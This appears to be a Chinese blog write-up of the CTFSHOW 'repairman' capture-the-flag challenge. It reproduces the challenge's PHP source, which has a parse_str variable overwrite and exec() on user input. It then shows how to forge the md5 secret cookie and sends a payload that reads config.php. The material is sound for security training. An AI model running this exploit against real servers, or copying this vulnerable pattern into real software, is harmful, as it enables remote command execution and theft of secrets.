CTFSHOW - repairman

文章摘要

Bpple-GPT

CTFSHOW - repairman

PHP问题,命令执行

等个五秒钟会爆出代码:

尽量整理一下格式,我都被误导了一下

<?php
error_reporting(0);
session_start();

$config['secret'] = array();
include 'config.php';

if (isset($_COOKIE['secret'])) {
    $secret = &$_COOKIE['secret'];
} else {
    $secret = null;
}

if (empty($mode)) {
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query']);
    if (empty($mode)) {
        echo 'Your mode is the guest!';
    }
}

function cmd($cmd) {
    global $secret;
    echo 'Success change the ini! The logs record you!';
    exec($cmd);
    $secret['secret'] = $secret;
    $secret['id'] = $_SERVER['REMOTE_ADDR'];
    $_SESSION['secret'] = $secret;
}

if ($mode == '0') {
    if ($secret === md5('token')) {
        $secret = md5('test' . $config['secret']);
    }

    switch ($secret) {
        case md5('admin' . $config['secret']):
            echo 999;
            cmd($_POST['cmd']);
            break;
        case md5('test' . $config['secret']):
            echo 666;
            $cmd = preg_replace('/[^a-z0-9]/is', 'hacker', $_POST['cmd']);
            cmd($cmd);
            break;
        default:
            echo "hello, the repairman!";
            highlight_file(__FILE__);
            break;
    }
} elseif ($mode == '1') {
    echo '</br>hello, the user! We may change the mode to repair the server, please keep it unchanged';
} else {
    header('refresh:5;url=index.php?mode=1');
    exit;
}
?>

可以看到可以命令执行

而且代码审计之后就几个点

  • mode=0
  • $secret 等于 md5('admin'.$config['secret'])
  • 然后利用cmd执行命令
    switch ($secret) {
        case md5('admin' . $config['secret']):
            echo 999;
            cmd($_POST['cmd']);
            break;

我们构造第二条:

<?php
$config['secret'] = Array();
$secret = md5('admin'.$config['secret']);
echo $secret;
#da53eb34c1bc6ce7bbfcedf200148106

Payload:

cmd=cat config.php >1.txt

用键盘敲击出的不只是字符,更是一段段生活的剪影、一个个心底的梦想。希望我的文字能像一束光,在您阅读的瞬间,照亮某个角落,带来一丝温暖与共鸣。

BX33661

站长

不具版权性
不具时效性

文章内容不具时效性。若文章内容有错误之处,请您批评指正。


目录

欢迎来到Bpple的站点,为您导航全站动态

64 文章数
20 分类数
44 评论数
15标签数
最近评论
bpple

bpple


一切顺利

fetain

fetain


good luck

bx

bx


good luck

热门文章

Emoji收集

2024-11-01

542
Hello Halo

2024-10-30

524
本地部署LLM

2024-08-22

505
Uptime Kuma

2024-11-29

499
229

访问统计